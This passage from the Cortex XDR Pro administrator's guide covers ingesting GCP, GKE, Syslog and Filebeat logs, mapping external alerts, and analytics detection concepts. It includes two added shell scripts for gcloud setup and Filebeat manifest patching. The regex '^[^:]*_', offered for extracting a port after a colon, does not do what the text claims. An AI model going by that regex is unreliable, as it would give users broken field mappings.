STEP 4 | Create a service account and authentication key.


You will use the key to enable Cortex XDR to authenticate with the subscription service.
1. Select the hamburger menu and then select IAM & Admin > Service Accounts.
2. Create Service Account.
3. Enter a Service account name and then Create.
4. Select a role for the account: Pub/Sub > Pub/Sub Subscriber.
5. Click Continue > Done.
6. Locate the service account by name, using the filters to refine the results, if needed.
7. Click the Actions menu identified by the three dots in the row for the service account and then
Create Key.
8. Select JSON as the key type, and then Create.

After you create the service account key, G Cloud automatically downloads it.

STEP 5 | In Cortex XDR, set up SaaS Log Collection.


1. Select > Settings > SaaS Log Collection.
2. In the Google Cloud Platform configuration, click the here link.

3. Enter the Subscription Name that you previously noted or copied.


4. Browse to the JSON file containing your authentication key for the service account.
5. Test the provided settings and, if successful, proceed to Enable log collection.

STEP 6 | After Cortex XDR begins receiving information from the GCP Pub/Sub service, you can use the
XQL Query language to search for specific data.

Set up Log Forwarding Using the GCP Cloud Shell Terminal


STEP 1 | Launch the GCP cloud shell terminal or use your preferred shell with gcloud installed.

STEP 2 | Define your project ID.

gcloud config set project <PROJECT_ID>

STEP 3 | Create a Pub/Sub topic.

gcloud pubsub topics create <TOPIC_NAME>

STEP 4 | Create a subscription for this topic.

gcloud pubsub subscriptions create <SUBSCRIPTION_NAME> --topic=<TOPIC_NAME>

Note the subscription name you define in this step as you will need it to set up log ingestion from Cortex
XDR.

STEP 5 | Create a logging sink.


During the logging sink creation, you can also define additional log filters to exclude specific logs. To
filter logs, supply the optional parameter --log-filter=<LOG_FILTER>

gcloud logging sinks create <SINK_NAME> pubsub.googleapis.com/projects/<PROJECT_ID>/topics/<TOPIC_NAME> --log-filter=<LOG_FILTER>

If setup is successful, the console displays a summary of your log sink settings:

Created [https://logging.googleapis.com/v2/projects/
PROJECT_ID/sinks/SINK_NAME]. Please remember to grant
`serviceAccount:LOGS_SINK_SERVICE_ACCOUNT` \ the Pub/Sub Publisher role
on the topic. More information about sinks can be found at /logging/docs/
export/configure_export

STEP 6 | Grant the log sink service account permission to publish to the new topic.
Note the serviceAccount name from the previous step and use it as the member to which you grant
publish access.

gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> --member serviceAccount:<LOGS_SINK_SERVICE_ACCOUNT> --role=roles/pubsub.publisher

STEP 7 | Create a service account.


For example, use cortex-xdr-sa as the service account name and Cortex XDR Service Account as the
display name.

gcloud iam service-accounts create <SERVICE_ACCOUNT> --description="<DESCRIPTION>" --display-name="<DISPLAY_NAME>"

STEP 8 | Grant the IAM role to the service account.

gcloud pubsub subscriptions add-iam-policy-binding <SUBSCRIPTION_NAME> --member serviceAccount:<SERVICE_ACCOUNT>@<PROJECT_ID>.iam.gserviceaccount.com --role=roles/pubsub.subscriber

STEP 9 | Create a JSON key for the service account.


You will need the JSON file to enable Cortex XDR to authenticate with the GCP service. Specify the file
destination and filename using a .json extension.

gcloud iam service-accounts keys create <OUTPUT_FILE> --iam-account <SERVICE_ACCOUNT>@<PROJECT_ID>.iam.gserviceaccount.com
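The cloud shell procedure in steps 2 through 9 above, as one added example script (not from the Cortex XDR guide or from Google). All project, topic, subscription, sink, service account and key file names are placeholders that you override through the environment. Two things differ from the step-by-step commands and are my additions: the sink's writer identity is read back with gcloud logging sinks describe instead of being copied from the console output, and DRY_RUN=1 (the default here) only prints the gcloud commands so you can review them before running with DRY_RUN=0. The helpers sink_destination, sa_email and run are my own names.

```shell
#!/bin/sh
# Added example (not from the Cortex XDR guide or from Google): the cloud shell
# procedure as one script. Every name below is a placeholder; override it
# through the environment. DRY_RUN=1 (the default) only prints the gcloud
# commands so they can be reviewed; DRY_RUN=0 executes them.
set -eu

PROJECT_ID="${PROJECT_ID:-my-gcp-project}"
TOPIC_NAME="${TOPIC_NAME:-cortex-xdr-logs}"
SUBSCRIPTION_NAME="${SUBSCRIPTION_NAME:-cortex-xdr-logs-sub}"
SINK_NAME="${SINK_NAME:-cortex-xdr-sink}"
SERVICE_ACCOUNT="${SERVICE_ACCOUNT:-cortex-xdr-sa}"   # the guide's suggested name
KEY_FILE="${KEY_FILE:-cortex-xdr-sa.json}"
LOG_FILTER="${LOG_FILTER:-}"   # optional sink filter; empty exports every log
DRY_RUN="${DRY_RUN:-1}"

# Naming helpers, kept separate so the resource names can be checked without gcloud.
sink_destination() { printf 'pubsub.googleapis.com/projects/%s/topics/%s\n' "$1" "$2"; }
sa_email()         { printf '%s@%s.iam.gserviceaccount.com\n' "$1" "$2"; }

# Print or execute a command, depending on DRY_RUN.
run() {
    if [ "$DRY_RUN" = "1" ]; then printf '+ %s\n' "$*"; else "$@"; fi
}

setup_gcp_log_forwarding() {
    dest="$(sink_destination "$PROJECT_ID" "$TOPIC_NAME")"
    sa="serviceAccount:$(sa_email "$SERVICE_ACCOUNT" "$PROJECT_ID")"

    run gcloud config set project "$PROJECT_ID"
    run gcloud pubsub topics create "$TOPIC_NAME"
    run gcloud pubsub subscriptions create "$SUBSCRIPTION_NAME" --topic="$TOPIC_NAME"

    # The log sink; --log-filter is only passed when a filter was given.
    if [ -n "$LOG_FILTER" ]; then
        run gcloud logging sinks create "$SINK_NAME" "$dest" --log-filter="$LOG_FILTER"
    else
        run gcloud logging sinks create "$SINK_NAME" "$dest"
    fi

    # GCP assigns the sink's writer identity at creation; read it back instead of
    # copying it from the console output. (Placeholder name in dry-run mode.)
    if [ "$DRY_RUN" = "1" ]; then
        writer="serviceAccount:LOGS_SINK_SERVICE_ACCOUNT"
    else
        writer="$(gcloud logging sinks describe "$SINK_NAME" --format='value(writerIdentity)')"
    fi
    # Least privilege: the sink identity may only publish, and only to this topic.
    run gcloud pubsub topics add-iam-policy-binding "$TOPIC_NAME" \
        --member="$writer" --role=roles/pubsub.publisher

    # Dedicated identity for Cortex XDR, allowed only to pull from this subscription.
    run gcloud iam service-accounts create "$SERVICE_ACCOUNT" \
        --description="Pulls GCP logs into Cortex XDR" \
        --display-name="Cortex XDR Service Account"
    run gcloud pubsub subscriptions add-iam-policy-binding "$SUBSCRIPTION_NAME" \
        --member="$sa" --role=roles/pubsub.subscriber

    # The JSON key is the file you upload in Cortex XDR > Settings > SaaS Log Collection.
    run gcloud iam service-accounts keys create "$KEY_FILE" \
        --iam-account="$(sa_email "$SERVICE_ACCOUNT" "$PROJECT_ID")"
}

setup_gcp_log_forwarding
```

The script assumes none of the resources exist yet (gcloud reports an error when asked to create an existing topic or subscription). The two IAM bindings keep the procedure's least-privilege shape: the sink identity gets only roles/pubsub.publisher on the one topic, and the Cortex XDR service account only roles/pubsub.subscriber on the one subscription. Treat the generated key file as a credential: upload it to Cortex XDR and then remove it from the shell machine.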

STEP 10 | In Cortex XDR, set up SaaS Log Collection.

1. Select > Settings > SaaS Log Collection.
2. In the Google Cloud Platform configuration, click the here link.

3. Enter the Subscription Name that you previously noted or copied.


4. Browse to the JSON file containing your authentication key for the service account.
5. Test the provided settings and, if successful, proceed to Enable log collection.

STEP 11 | After Cortex XDR begins receiving information from the GCP Pub/Sub service, you can use
the XQL Query language to search for specific data.

Ingest Logs from Google Kubernetes Engine


Ingesting logs and data requires a Cortex XDR Pro per TB license.

Instead of forwarding Google Kubernetes Engine (GKE) logs directly to Google Stackdriver, Cortex XDR can
ingest container logs from GKE using Elasticsearch* Filebeat. To receive logs, you must install Filebeat on
your containers and enable SaaS Log Collection settings for Filebeat.
After Cortex XDR begins receiving logs, the app automatically creates an XQL dataset using the vendor and
product name that you specify during Filebeat setup. It is recommended to specify a descriptive name. For
example, if you specify google as the vendor and kubernetes as the product, the dataset name will be
google_kubernetes_raw. If you leave the product and vendor blank, Cortex XDR assigns the dataset a
name of container_container_raw.
After Cortex XDR creates the dataset, you can search your GKE logs using XQL Search.

STEP 1 | Install Filebeat on your containers.


For more information, see https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html.

STEP 2 | Ingest Logs from Elasticsearch Filebeat.


Record your token key and API URL for the Filebeat Collector instance as you will need these later in
this workflow.

STEP 3 | Deploy a Filebeat as a DaemonSet on Kubernetes.


This ensures there is a running instance of Filebeat on each node of the cluster.
1. Download the manifest file to a location where you can edit it.

curl -L -O https://raw.githubusercontent.com/elastic/beats/7.10/deploy/kubernetes/filebeat-kubernetes.yaml
2. Open the YAML file in your preferred text editor.
3. Remove the cloud.id and cloud.auth lines.

4. For the output.elasticsearch configuration, replace the hosts, username, and password
with environment variable references for hosts and api_key, and add a field and value for
compression_level and bulk_max_size.

5. In the DaemonSet configuration, locate the env configuration and replace ELASTIC_CLOUD_AUTH,
ELASTIC_CLOUD_ID, ELASTICSEARCH_USERNAME, ELASTICSEARCH_PASSWORD,
ELASTICSEARCH_HOST, ELASTICSEARCH_PORT and their relative values with the following:
• ELASTICSEARCH_ENDPOINT—Enter the API URL for your Cortex XDR tenant. You can copy
the URL from the Filebeat Collector instance you set up for GKE in the Cortex XDR management
console ( > Settings > SaaS Integrations > Copy API URL). The URL will include your tenant
name (https://api-<tenant external URL>:443/logs/v1/filebeat).

• ELASTICSEARCH_API_KEY—Enter the token key you recorded earlier during the configuration
of your Filebeat Collector instance.
After you configure these settings your configuration should look like the following image.

6. Save your changes.

STEP 4 | If you use RedHat OpenShift, you must also specify additional settings.
See https://www.elastic.co/guide/en/beats/filebeat/7.10/running-on-kubernetes.html.

STEP 5 | Deploy Filebeat on your Kubernetes.

kubectl create -f filebeat-kubernetes.yaml

This deploys Filebeat in the kube-system namespace. If you want to deploy the Filebeat configuration
in another namespace, change the namespace value in every resource defined in the YAML file and
add -n <your_namespace> to the kubectl command.
After you deploy your configuration, the Filebeat DaemonSet runs on every node of your cluster to
forward container logs to Cortex XDR. You can review the configuration from the Kubernetes Engine
console: Workloads > Filebeat > YAML.

STEP 6 | After Cortex XDR begins receiving logs from GKE, you can use the XQL Search to search for
logs in the new dataset.

Elasticsearch is a trademark of Elasticsearch B.V., registered in the U.S. and in other countries.

Additional Log Ingestion Methods for Cortex
XDR
• Ingest Logs from a Syslog Receiver
• Ingest Logs from Elasticsearch Filebeat

Ingest Logs from a Syslog Receiver


Ingesting logs and data requires a Cortex XDR Pro per TB license.

Cortex XDR can receive Syslog from a variety of supported vendors (see External Data Ingestion Vendor
Support). In addition, Cortex XDR can receive Syslog from additional vendors that use CEF or LEEF
formatted over Syslog (TLS not supported).
After Cortex XDR begins receiving logs from the third-party source, Cortex XDR automatically parses the
logs in LEEF format and creates a dataset with the name <vendor>_<product>_raw. You can then use
XQL Search queries to view logs and create new IOC or BIOC rules.
To receive Syslog from an external source:

STEP 1 | Set up your Syslog receiver to forward logs.

STEP 2 | Activate the Syslog Collector applet on a Broker VM within your network.

STEP 3 | Use the XQL Search to search your logs.

Ingest Logs from Elasticsearch Filebeat


If you want to ingest logs about file activity on your endpoints and servers and do not use the Cortex XDR
agent, you can install Elasticsearch* Filebeat as a system logger and then forward those logs to Cortex XDR.
To facilitate log ingestion, Cortex XDR supports the same protocols that Filebeat and Elasticsearch use to
communicate.
To provide additional context during investigations, Cortex XDR automatically creates a new XQL dataset
from your Filebeat logs. You can then use the XQL dataset to search across the logs Cortex XDR received
from Filebeat.
To receive logs, you configure collection settings for Filebeat in Cortex XDR and output settings in your
Filebeat installations. As soon as Cortex XDR begins receiving logs, the data is visible in XQL Search queries.

STEP 1 | In Cortex XDR, set up Log Collection.


1. Select > Settings > Custom Collections.
2. In the Filebeat configuration, click the here link.

3. Enter a descriptive Name for your Filebeat log collection configuration.
4. Enter the Vendor and Product for the type of logs you are ingesting.
The vendor and product are used to define the name of your XQL dataset
(<vendor>_<product>_raw). If you do not define a vendor or product, Cortex XDR examines the
log header to identify the type and uses that to define the vendor and product in the dataset. For
example, if the type is Acme and you opt to let Cortex XDR determine the values, the dataset name
would be acme_acme_raw.
5. Save & Generate Token.
Click the copy icon next to the key and record it somewhere safe. You will need to provide this key
when you set up output settings on your Filebeat instance. If you forget to record the key and close
the window you will need to generate a new key and repeat this process.

STEP 2 | Set up Filebeat to forward logs.


After installing the Filebeat agent, configure an Elasticsearch output:
1. Under the output.elasticsearch section, configure the following entities:

• hosts—Copy the API URL from your Filebeat configuration and paste it in this field.
• compression_level—5 (recommended)
• bulk_max_size—1000 (recommended)
• api_key—Paste the key you created when you configured Filebeat Log Collection in Cortex
XDR.
2. Save the changes to your output file.
After Cortex XDR begins receiving logs from Filebeat, they will be available in XQL Search queries.
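The output.elasticsearch settings listed above are the same ones that the GKE procedure (Ingest Logs from Google Kubernetes Engine, step 3) applies by hand to Elastic's filebeat-kubernetes.yaml manifest. The following script is an added example, not from the Cortex XDR guide or from Elastic, that makes those edits with awk: it drops cloud.id and cloud.auth, points hosts at ${ELASTICSEARCH_ENDPOINT}, swaps username and password for api_key, adds compression_level and bulk_max_size, and replaces the six Elastic environment variables in the DaemonSet with ELASTICSEARCH_ENDPOINT and ELASTICSEARCH_API_KEY. It assumes the layout of the stock 7.x manifest; the sample manifest embedded at the end is constructed for the demonstration and contains only the lines the patcher touches.

```shell
#!/bin/sh
# Added example (not from the Cortex XDR guide or from Elastic): rewrite the stock
# filebeat-kubernetes.yaml (or a plain filebeat.yml) so its output.elasticsearch
# section sends logs to the Cortex XDR Filebeat collector. Assumes the layout of
# Elastic's 7.x manifest. Reads YAML on stdin, writes the patched YAML to stdout.
set -eu

patch_filebeat_config() {
    awk '
    # Drop the Elastic Cloud settings.
    /^[ \t]*cloud\.(id|auth):/ { next }

    # output.elasticsearch: point hosts at the Cortex XDR API URL (env var reference).
    /^[ \t]*hosts:/ {
        sub(/hosts:.*/, "hosts: [\"${ELASTICSEARCH_ENDPOINT}\"]")
        print; next
    }

    # Replace basic auth with the collector token and add the recommended batching.
    /^[ \t]*username:/ {
        indent = $0; sub(/[^ \t].*$/, "", indent)
        print indent "api_key: ${ELASTICSEARCH_API_KEY}"
        print indent "compression_level: 5"
        print indent "bulk_max_size: 1000"
        next
    }
    /^[ \t]*password:/ { next }

    # DaemonSet env: the six Elastic variables become the two Cortex XDR ones.
    /^[ \t]*- name: (ELASTICSEARCH_(HOST|PORT|USERNAME|PASSWORD)|ELASTIC_CLOUD_(ID|AUTH))[ \t]*$/ {
        if (!env_done) {
            indent = $0; sub(/-.*$/, "", indent)
            print indent "- name: ELASTICSEARCH_ENDPOINT"
            print indent "  value: \"https://api-<tenant external URL>:443/logs/v1/filebeat\""
            print indent "- name: ELASTICSEARCH_API_KEY"
            print indent "  value: \"<token key recorded from the Filebeat collector>\""
            env_done = 1
        }
        skip_value = 1; next
    }
    # The value: line that follows a removed variable goes with it.
    skip_value && /^[ \t]*value:/ { skip_value = 0; next }
    { skip_value = 0; print }
    '
}

# Constructed sample, not the real manifest: only the lines the patcher touches,
# plus one unrelated env entry (NODE_NAME) that must survive untouched.
SAMPLE_MANIFEST="$(cat <<'EOF'
apiVersion: v1
kind: ConfigMap
data:
  filebeat.yml: |-
    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}
    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
spec:
  template:
    spec:
      containers:
      - name: filebeat
        env:
        - name: ELASTICSEARCH_HOST
          value: elasticsearch
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          value: changeme
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
EOF
)"

# Patch the constructed sample; returns the patched YAML on stdout.
patched_sample() {
    printf '%s\n' "$SAMPLE_MANIFEST" | patch_filebeat_config
}

patched_sample
```

Run it on the real file as patch_filebeat_config < filebeat-kubernetes.yaml > patched.yaml, then fill in the two placeholder values (or, for a plain filebeat.yml that has no DaemonSet env block, export the two variables before starting Filebeat). Because the patcher matches any hosts:, username: and password: lines, review the diff before deploying if your manifest was customized beyond the stock layout.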

STEP 3 | (Optional) Monitor your Filebeat integration.

You can return to the > Settings > Custom Collections page to monitor the status of your Filebeat
configuration. For each instance, Cortex XDR displays the number of logs received in the last hour, day,
and week. You can also use the Data Ingestion Dashboard to view general statistics about your data
ingestion configurations.

STEP 4 | (Optional) Set up alert notifications to monitor the following events:


• A Filebeat agent status changes to disconnected.
• A Filebeat module has stopped sending logs.

Elasticsearch is a trademark of Elasticsearch B.V., registered in the U.S. and in other countries.

Ingest External Alerts
For a more complete and detailed picture of the activity involved in an incident, Cortex XDR can ingest
alerts from any external source. Cortex XDR stitches the external alerts together with relevant endpoint
data and displays alerts from external sources in relevant incidents and alerts tables. You can also see
external alerts and related artifacts and assets in Causality views.
To ingest alerts from an external source, you configure your alert source to forward alerts (in CEF, LEEF,
CISCO, or CORELIGHT format) to the syslog collector. You can also ingest alerts from external sources
using the Cortex XDR API.
After Cortex XDR begins receiving external alerts, you must map the following required fields to the Cortex
XDR format:
• Timestamp
• Severity
• Source IP address
• Source port
• Destination IP address
• Destination port

If you send pre-parsed alerts using the Cortex XDR API, additional mapping is not required.

Storage of external alerts is determined by your Cortex Data Lake data retention policy.
To ingest external alerts:

STEP 1 | Send alerts from an external source to Cortex XDR.


There are two ways to send alerts:
• Cortex XDR API—Use the insert_cef_alerts API to send the raw syslog alerts or use the
insert_parsed_alerts API to convert the syslog alerts to the Cortex XDR format before sending them
to Cortex XDR. If you use the API to send logs, you do not need to perform the additional mapping
step in Cortex XDR.
• Activate Syslog collector—Activate the syslog collector and then configure the alert source to
forward alerts to the syslog collector. Then configure an alert mapping rule as follows.

STEP 2 | In Cortex XDR, select > Settings > External Alerts.

STEP 3 | Right-click the Vendor Product for your alerts and select Filter and Map.

STEP 4 | Use the filters at the top of the table to narrow the results to only the alerts you want to map.
Cortex XDR displays a limited sample of results during the mapping rule creation. As you define your
filters, Cortex XDR applies the filter to the limited sample but does not apply the filters across all alerts.
As a result, you might not see any results from the alert sample during the rule creation.

STEP 5 | Click Next to begin a new mapping rule.


1. On the left, define a Name and optional Description to identify your mapping rule.
2. Map each required Cortex XDR field to a field in your alert source.

If needed, use the field converter to translate the source field to the Cortex XDR syntax.
For example, if you use a different severity system, you need to use the converter to map your
severities fields to the Cortex XDR risks of High, Medium, and Low.
You can also use regex to convert the fields to extract the data to facilitate matching with the Cortex
XDR format. For example, say you need to map the port but your source field contains both IP
address and port (192.168.1.200:8080). To extract everything after the :, use the following
regex:
^[^:]*_
For additional context when you are investigating an incident, you can also map additional optional
fields to fields in your alert source.

STEP 6 | Submit your alert filter and mapping rule when finished.

Analytics
> Analytics Concepts

Analytics Concepts
Network security professionals know that safeguarding a network requires a defense-in-depth strategy.
This layered approach to network security means ensuring that software is always patched and current,
while running hardware and software systems that are designed to keep attackers out. Many strategies
exist to keep unwanted users out of a network; most of them work by stopping intrusion attempts at the
network perimeter.
As good and necessary as those strategies and products are, they can all defend only against known threats.
Systems that look for malicious software, for example, traditionally do their work based on previously
identified MD5 signatures. But the authors of these viruses constantly make trivial modifications that change
the virus signature, so that virus scanners miss the virus until their MD5 database is updated with the
newly discovered signatures.
In other words, defensive network systems are constantly trying to keep up with the best efforts of
aggressive, nimble attackers. Your defensive network software must be 100% correct 100% of the time to
prevent successful attacks. A determined attacker, on the other hand, must be successful only once to ruin
your day.
Consequently, your network defense-in-depth strategy must include software and processes that are
designed to detect and respond to an intruder who has successfully penetrated your systems. This is the
position that Cortex XDR takes in your enterprise. The app efficiently and automatically identifies abnormal
activity on your network while providing you with the exact information you need to rapidly evaluate
potential threats and then isolate and remove those threats from your network before they can perform
real damage.
• Analytics Engine
• Analytics Sensors
• Coverage of the MITRE Attack Tactics
• Analytics Detection Time Intervals
• Analytics Alerts and Analytics BIOCs

Analytics Engine
The Cortex XDR™ app uses an analytics engine to examine logs and data from your sensors. The analytics
engine retrieves logs from Cortex Data Lake to understand the normal behavior (creates a baseline) so
that it can raise alerts when abnormal activity occurs. The analytics engine accesses your logs as they are
streamed to Cortex Data Lake and analyzes the data as soon as it arrives. Cortex XDR raises an Analytics
alert when the analytics engine determines an anomaly.
The analytics engine is built to process, in parallel, large amounts of data stored in Cortex Data Lake. The
ultimate goal is to identify normal behavior so that the Cortex apps can recognize abnormal behavior and use
alerts to notify you of it. The analytics engine can examine traffic and data from a variety of sources,
such as network activity from firewall logs, VPN logs (from Prisma Access through the Panorama plugin),
endpoint activity data (on Windows endpoints), Active Directory, or a combination of those sources, to
identify endpoints and users on your network. After endpoints and users are identified, the analytics engine
collects relevant details about every asset that it sees based on the information it obtains from the logs.
The analytics engine can detect threats from only network data or only endpoint data, but for more context
when investigating an alert, a combination of data sources is recommended.
The list of what the engine looks for is large, varied, and constantly growing but, as a consequence of this
analysis, the analytics engine is able to build profiles about every endpoint and user of which it knows
about. Profiles allow the engine to put the activity of the endpoint or user in context by comparing it against
similar endpoints or users. The analytics engine creates and maintains a very large number of profile types
but, generally, they can all be placed into three categories.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics 389


© 2020 Palo Alto Networks, Inc.
Analytics Sensors
To detect anomalous behavior, Cortex XDR can analyze logs and data from a variety of sensors.

Palo Alto Networks sensors
• Firewall traffic logs—Palo Alto Networks firewalls perform traditional and next-generation firewall
  activities. The Cortex XDR analytics engine can analyze Palo Alto Networks firewall logs to obtain
  intelligence about the traffic on your network. A Palo Alto Networks firewall can also enforce Security
  policy based on IP addresses and domains associated with Analytics alerts by using external dynamic lists.
• Enhanced application logs (EAL)—To provide greater coverage and accuracy, you can enable enhanced
  application logging on your Palo Alto Networks firewalls. EALs are collected by the firewall to increase
  visibility into network activity for Palo Alto Networks apps and services, such as Cortex XDR. Only
  firewalls sending logs to Cortex Data Lake can generate enhanced application logs.
  Examples of the types of data that enhanced application logs gather include records of DNS queries, the
  HTTP User-Agent header field that specifies the web browser or tool used to access a URL, and
  information about DHCP automatic IP address assignment. With DHCP information, for example, Cortex
  XDR can alert on unusual activity based on hostname instead of IP address. This allows the security
  analyst using Cortex XDR to meaningfully assess whether the user's activity is within the scope of his or
  her role and, if not, to more quickly take action to stop the activity.
• GlobalProtect and Prisma Access logs—If you use GlobalProtect or Prisma Access to extend your firewall
  security coverage to your mobile users, Cortex XDR can also analyze VPN traffic to detect anomalous
  behavior on mobile endpoints.
• Firewall URL logs (part of firewall threat logs)—Palo Alto Networks firewalls can log Threat log entries
  when traffic matches one of the Security Profiles attached to a security rule on the firewall. Cortex XDR
  can analyze Threat log entries relating to URLs and raise alerts that indicate malicious behavior such as
  command and control and exfiltration.
• Cortex XDR agent endpoint data—With a Cortex XDR Pro per Endpoint license, you can deploy Cortex
  XDR agents on your endpoints to protect them from malware and software exploits. The analytics engine
  can also analyze the EDR data collected by the Cortex XDR agent to raise alerts. To collect EDR data, you
  must install Cortex XDR agent 6.0 or a later release on your Windows endpoints (Windows 7 SP1 or
  later). The Cortex XDR analytics engine can analyze activity and traffic based solely on endpoint activity
  data sent from Cortex XDR agents. For increased coverage and greater insight during investigations, use a
  combination of Cortex XDR agent data and firewall logs to supply activity data for analysis.
• Pathfinder data collector—In a firewall-only deployment where the Cortex XDR agent is not installed on
  your endpoints, you can use Pathfinder to monitor endpoints. Pathfinder scans unmanaged hosts, servers,
  and workstations for malicious activity. The analytics engine can also analyze Pathfinder data collector
  data in combination with other data sources to increase coverage of your network and endpoints, and to
  provide more context when investigating alerts.
• Directory Sync logs—If you use the Directory Sync service to provide Cortex XDR with Active Directory
  data, the analytics engine can also raise alerts on your Active Directory logs.

External sensors
• Third-party firewall logs—If you use non-Palo Alto Networks firewalls (Check Point, Fortinet, Cisco
  ASA) in addition to or instead of Palo Alto Networks firewalls, you can set up a syslog collector to
  facilitate log and alert ingestion. By sending your firewall logs to Cortex XDR, you can increase detection
  coverage and take advantage of Cortex XDR analysis capabilities. When Cortex XDR analyzes your
  firewall logs and detects anomalous behavior, it raises an alert.
• Third-party authentication service logs—If you use an authentication service (Microsoft Azure AD, Okta,
  or PingOne), you can set up log collection to ingest authentication logs and data into authentication
  stories.
• Windows Event Collector logs—The Windows Event Collector (WEC) runs on the broker VM and collects
  event logs from Domain Controllers (DCs). The analytics engine can analyze these event logs to raise
  alerts, such as for credential access and defense evasion.

Coverage of the MITRE Attack Tactics
Network attacks follow predictable patterns. If you interfere with any portion of this pattern, the attack will
be neutralized.
The analytics engine can alert on any of the following attack tactics as defined by the MITRE ATT&CK™
knowledge base of tactics.

• Execution—After attackers gain a foothold in your network, they can use various techniques to execute
  malicious code on a local or remote endpoint. The Cortex XDR app detects malware and grayware on
  your network using a combination of network activity, Pathfinder data collector scans of your
  unmanaged endpoints, endpoint data from your Cortex XDR agents, and evaluation of suspicious files
  using the WildFire® cloud service.
• Persistence—To carry out a malicious action, an attacker can try techniques that maintain access in a
  network or on an endpoint. An attacker can initiate configuration changes—such as a system restart or
  failure—that require the endpoint to restart a remote access tool or open a backdoor that allows the
  attacker to regain access to the endpoint.
• Discovery—After an attacker has access to a part of your network, the attacker uses discovery
  techniques to explore and identify subnets, and to discover servers and the services hosted on those
  endpoints. The idea is to identify vulnerabilities within your network. The app detects attacks that use
  this tactic by looking for symptoms in your internal network traffic such as changes in connectivity
  patterns, including increased rates of connections, failed connections, and port scans.
• Lateral Movement—To expand the footprint inside your network, an attacker uses lateral movement
  techniques to obtain credentials to gain additional access to more data in the network. The analytics
  engine detects attacks during this phase by examining administrative operations (such as SSH, RDP, and
  HTTP), file share access, and user credential usage that is beyond the norm for your network. Some of
  the symptoms the app looks for are increased administrative activity, SMB usage, and remote code
  execution.
• Command and Control—The command and control tactic allows an attacker to remotely issue commands
  to an endpoint and receive information from it. The analytics engine identifies intruders using this tactic
  by looking for anomalies in outbound connections, DNS lookups, and endpoint processes with bound
  ports. The app looks for unexplained changes in the periodicity of connections and failed DNS lookups,
  changes in random DNS lookups, and other symptoms that suggest an attacker has gained initial control
  of a system.
• Exfiltration—Exfiltration tactics are techniques used to take data, such as valuable enterprise data, out
  of a network. The app seeks to identify exfiltration by examining outbound connections with a focus on
  the volume of data being transferred. Increases in this volume are an important symptom of data
  exfiltration.

Analytics Detection Time Intervals
The analytics engine for Cortex XDR retrieves logs from Cortex Data Lake to understand the normal
behavior (creates a baseline) so that it can raise alerts when abnormal activity occurs. This analysis is highly
sophisticated and performed on more than a thousand dimensions of data. Internally, the Cortex XDR app
organizes its analytics activity into algorithms called detectors. Each detector is responsible for raising an
alert when worrisome behavior is detected.
To raise alerts, each detector compares recent past behavior to the expected baseline by examining
the data found in your logs. A certain amount of log file time is required to establish a baseline and
then a certain amount of recent log file time is required to identify what is currently happening in your
environment.
There are several meaningful time intervals for Cortex XDR Analytics detectors:
• Learning Period—The shortest amount of log file time before the app can raise an alert. This is typically
  the time from when a detector first starts running to when you see an alert but, in some cases, detectors
  pause after an upgrade as they enter a new learning period. Most but not all detectors will wait until they
  have a learning period's worth of data before they run. This learning period exists to give the detector
  enough data to establish a baseline, which in turn helps to avoid false positives. The learning period is
  also referred to as the profiling or waiting period and, informally, it is also referred to as soak time.
• Test Period—The amount of logging time that a detector uses to determine if unusual activity is occurring
  on your network. The detector compares test period data to the baseline created during the training
  period, and uses that comparison to identify abnormal behavior.
• Training Period—The amount of logging time that the detector requires to establish a baseline, and to
  identify the behavioral limits beyond which an alert is raised. Because your network is not static in terms
  of its topology or usage, detectors are constantly updating the baselines that they require for their
  analytics. For this update process, the training period is how far back in time the detector goes to update
  and tune the baseline. This period is also referred to as the baseline period.

  When establishing a baseline, detectors compute limits beyond which network activity will require an
  alert. In some cases, detectors do not compute baseline limits; instead, they are predetermined by Cortex
  XDR engineers. The engineers determine the values used for predetermined limits using statistical
  analysis of malicious activity recorded worldwide. The engineers routinely perform this statistical analysis
  and update the predetermined limits as needed with each release of Cortex XDR.

• Deduplication Period—The amount of time during which additional alerts for the same activity or
  behavior are suppressed before Cortex XDR raises another Analytics alert.

These time periods are different for every Cortex XDR Analytics detector. The actual amount of logging
data (measured in time) required to raise any given Cortex XDR Analytics alert is identified in the Cortex
XDR Analytics Alert Reference.

Analytics Alerts and Analytics BIOCs


To raise a typical Analytics alert, the Analytics Engine establishes a baseline of activity and analyzes
behavior patterns over time. The engine raises the alert when it detects suspicious behaviors (multiple
events) that deviate from the baseline.
In addition to standard Analytics alerts, there is another category of alerts for Analytics BIOCs (behavioral
indicators of compromise). In contrast to standard Analytics alerts, Analytics BIOCs—sometimes referred to
informally as ABIOCs—indicate a single event of suspicious behavior with an identified chain of causality.
To identify the context and chain of causality, ABIOCs leverage user, endpoint, and network profiles.
The profile is generated by the Analytics Engine and can be based on a simple statistical profile or a more
complex machine-learning profile. Cortex XDR tailors each ABIOC to your specific environment after
analyzing your logs and data sources. Palo Alto Networks threat researchers continually tune and deliver
new ABIOCs with content updates.

Asset Management
> About Asset Management
> Configure Your Network Parameters
> Manage Your Network Assets

About Asset Management
Network asset visibility is a crucial investigative tool in discovering rogue devices in your network and
preventing malicious activity. Understanding how many managed and unmanaged assets are part of your
network provides you with vital information to better assess your security exposure and track network
communication.
Cortex XDR Asset Management provides an accurate representation of your network assets by collecting
and analyzing the following network resources:
• User-defined IP Address Ranges and Domain Names associated with your internal network
• EDR data collected by Firewall Logs
• Cortex XDR Agent Logs
• Broker VM Network Mapper
• Pathfinder Data Collector
With the data aggregated by Cortex XDR Asset Management, you can locate and manage your assets more
effectively and reduce the amount of research required to:
• Distinguish between assets managed and unmanaged by a Cortex XDR Agent.
• Identify assets that are part of your internal network.
• Track network data communications from within and outside your network.

Configure Your Network Parameters
In order to track and identify assets in your network, you need to define your internal IP address ranges and
